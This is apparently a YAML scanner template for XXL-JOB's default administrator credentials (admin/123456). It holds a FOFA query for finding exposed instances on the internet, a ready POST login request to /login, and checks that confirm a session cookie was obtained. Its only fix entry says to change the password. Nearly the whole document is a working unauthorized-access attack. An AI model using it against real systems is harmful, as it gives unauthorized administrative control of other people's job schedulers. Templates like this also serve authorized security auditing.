product: xxl-job
vName: xxl-job 默认密码
type: 访问控制
vID: [ ]
level: 3
vDesc: XXL-JOB 默认账户密码admin/123456
version: ''
note: ''
search:
  FOFA: app="XXL-JOB" || title="任务调度中心"
protocol: http
link: ''
fix:
  - 修改密码
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /login
      header:
        X-Requested-With: XMLHttpRequest
      data: userName=admin&password=123456
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"code":200'
            logic: and
          header:
            value:
              - XXL_JOB_LOGIN_IDENTITY
              - Set-Cookie
            logic: and